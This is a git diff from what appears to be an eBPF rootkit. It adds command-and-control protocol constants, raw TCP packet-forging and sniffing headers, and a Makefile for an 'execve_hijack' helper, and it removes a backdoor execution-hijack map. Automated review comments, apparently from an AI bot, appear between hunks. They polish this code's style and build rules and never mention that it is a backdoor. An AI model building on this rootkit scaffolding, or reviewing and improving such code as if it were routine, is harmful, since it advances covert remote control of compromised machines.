diff --git a/src/client/lib/RawTCP.h b/src/client/lib/RawTCP.h
index 30e7177..2ee831b 100644
--- a/src/client/lib/RawTCP.h
+++ b/src/client/lib/RawTCP.h
@@ -31,5 +31,6 @@ int rawsocket_send(packet_t packet);
 packet_t rawsocket_sniff();
+packet_t rawsocket_sniff_pattern(char* payload_pattern);
 #endif
\ No newline at end of file
diff --git a/src/client/lib/libRawTCP_Lib.a b/src/client/lib/libRawTCP_Lib.a
index 636ade3..8bbefb9 100644
Binary files a/src/client/lib/libRawTCP_Lib.a and b/src/client/lib/libRawTCP_Lib.a differ
diff --git a/src/common/map_prot.h b/src/common/map_prot.h
index 5f158d7..e9f92c9 100644
--- a/src/common/map_prot.h
+++ b/src/common/map_prot.h
@@ -11,19 +11,4 @@
 /*PROTECTED MAPS*/
 //Any attempt to access these maps will be blocked by the rootkit if the program is not whitelisted
-//Execution hijacking, holder of requesting/response data sent from/to the network backdoor
-#define EXEC_HIJACK_REQUEST_PROGRAM_MAX_LEN 256
-#define EXEC_HIJACK_RESPONSE_PROGRAM_MAX_LEN 256
-struct exec_hijack_data{ //Map value
- char req_buf[EXEC_HIJACK_REQUEST_PROGRAM_MAX_LEN];
- char res_buf[EXEC_HIJACK_RESPONSE_PROGRAM_MAX_LEN];
-};
-
-struct exec_prot_hijack{ //Map
- __uint(type, BPF_MAP_TYPE_ARRAY);
- __uint(max_entries, 1);
- __type(key, __u32); //just 1 entry allowed
- __type(value, struct exec_hijack_data);
-} exec_hijack SEC(".maps");
-
 #endif
\ No newline at end of file
diff --git a/src/ebpf/include/packet/c&c/c&c.h b/src/ebpf/include/packet/c&c/c&c.h
new file mode 100644
index 0000000..7fbec6b
--- /dev/null
+++ b/src/ebpf/include/packet/c&c/c&c.h
@@ -0,0 +1,10 @@
+#ifndef __BPF_CC_H
+#define __BPF_CC_H
+
+#define CC_PROT_SYN "CC_SYN"
+#define CC_PROT_ACK "CC_ACK"
+#define CC_PROT_SYN_ACK "CC_SYN_ACK"
+#define CC_PROT_SEPARATOR "#"
+
+
+#endif
\ No newline at end of file
diff --git a/src/helpers/Makefile b/src/helpers/Makefile
new file mode 100644
index 0000000..6aade0b
--- /dev/null
+++ b/src/helpers/Makefile
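Review bot: The new prototype `packet_t rawsocket_sniff_pattern(char* payload_pattern);` takes its match pattern as a mutable `char *`, so a string literal or a `const` buffer cannot be passed without a cast; a pattern is only read, so declare it `packet_t rawsocket_sniff_pattern(const char *payload_pattern);` (the implementation lives in the binary libRawTCP_Lib.a, so whether it writes through the pointer cannot be confirmed from this page). The neighbouring context line `packet_t rawsocket_sniff();` is not a prototype in C, since empty parentheses mean unspecified arguments; `packet_t rawsocket_sniff(void);` gives the compiler something to check calls against. Both lines reappear verbatim in the new src/helpers/lib/RawTCP.h (same blob 2ee831b), so the same fix applies there. The header's include-guard block begins outside the hunk.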
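Review bot: The include guard `__BPF_CC_H` is a double-underscore identifier, which C reserves for the implementation; rename it to something like `#ifndef BPF_CC_H` / `#define BPF_CC_H`. The file is also placed under a directory named `c&c`, and an unquoted `&` is a shell control operator, so any Makefile rule or `-I` flag that expands that path without quoting will be cut at the `&`; a directory name without shell metacharacters avoids that class of build breakage. The two blank lines before `#endif` and the missing final newline are cosmetic.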
@@ -0,0 +1,16 @@
+CC = gcc
+HEADERS = lib/RawTCP.h
+EXTRA_CFLAGS= -I$(PWD)/lib
+
+default:
+ make execve_hijack
+
+execve_hijack.o: execve_hijack.c $(HEADERS)
+ gcc -c execve_hijack.c
+
+execve_hijack: execve_hijack.o lib/libRawTCP_Lib.a
+ gcc -lm -o execve_hijack execve_hijack.o -L. lib/libRawTCP_Lib.a
+
+clean:
+ -rm -f execve_hijack.o
+ -rm -f execve_hijack
\ No newline at end of file
diff --git a/src/helpers/execve_hijack.o b/src/helpers/execve_hijack.o
new file mode 100644
index 0000000..2c65049
Binary files /dev/null and b/src/helpers/execve_hijack.o differ
diff --git a/src/helpers/lib/RawTCP.h b/src/helpers/lib/RawTCP.h
new file mode 100644
index 0000000..2ee831b
--- /dev/null
+++ b/src/helpers/lib/RawTCP.h
@@ -0,0 +1,36 @@
+#ifndef HEADER_RAWTCP_LIB
+#define HEADER_RAWTCP_LIB
+
+#include
+
+//Packet_t structure
+typedef struct packet_t{
+ struct iphdr *ipheader;
+ struct tcphdr *tcpheader;
+ char *payload;
+ int payload_length;
+ char* packet;
+}packet_t;
+
+//PacketForger headers
+packet_t build_standard_packet(
+ u_int16_t source_port,
+ u_int16_t destination_port,
+ const char* source_ip_address,
+ const char* destination_ip_address,
+ u_int32_t packet_length,
+ char* payload
+ );
+
+int packet_destroy(packet_t packet);
+
+int set_TCP_flags(packet_t packet, int hex_flags);
+
+//SocketManager headers
+int rawsocket_send(packet_t packet);
+
+packet_t rawsocket_sniff();
+
+packet_t rawsocket_sniff_pattern(char* payload_pattern);
+
+#endif
\ No newline at end of file
diff --git a/src/helpers/lib/libRawTCP_Lib.a b/src/helpers/lib/libRawTCP_Lib.a
new file mode 100644
index 0000000..8bbefb9
Binary files /dev/null and b/src/helpers/lib/libRawTCP_Lib.a differ
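Review bot: `CC` and `EXTRA_CFLAGS` are defined at the top of the new Makefile but never used: both recipes call `gcc` literally and the compile rule passes no `-I$(PWD)/lib`, so the header is found only if `execve_hijack.c` includes it by relative path (not visible here). Using the variables, `$(CC) $(EXTRA_CFLAGS) -c execve_hijack.c` and `$(CC) -o execve_hijack execve_hijack.o lib/libRawTCP_Lib.a -lm`, also moves `-lm` after the object that needs it, which is the order a single-pass linker requires. The `default` rule should invoke `$(MAKE)` rather than `make` so flags and the jobserver propagate, and `default` and `clean` belong in a `.PHONY:` line. The commit also checks in the built `execve_hijack.o`; build outputs are better kept out of version control.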
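Review bot: This file is a byte-for-byte copy of src/client/lib/RawTCP.h (both hunks carry blob 2ee831b), and the commit copies libRawTCP_Lib.a alongside it, so two copies of the same header and library now have to be kept in sync by hand; the helper build should instead point at one shared location (for example `HEADERS = ../client/lib/RawTCP.h` with a matching `-I`), or the library should move out of the client tree into a common directory. The line `+#include` shows no header name in this rendering — if that is an extraction artefact, ignore it, but the declarations below use `struct iphdr`, `struct tcphdr`, `u_int16_t` and `u_int32_t`, so this header must itself pull in the system headers that define them (on Linux `<netinet/ip.h>`, `<netinet/tcp.h>` and `<sys/types.h>`) rather than rely on the including file to do so. `build_standard_packet` takes `char* payload` while the two address parameters are `const char*`; if the payload is only copied into the packet, `const char *payload` would make the contract consistent, though the binary library prevents confirming that here.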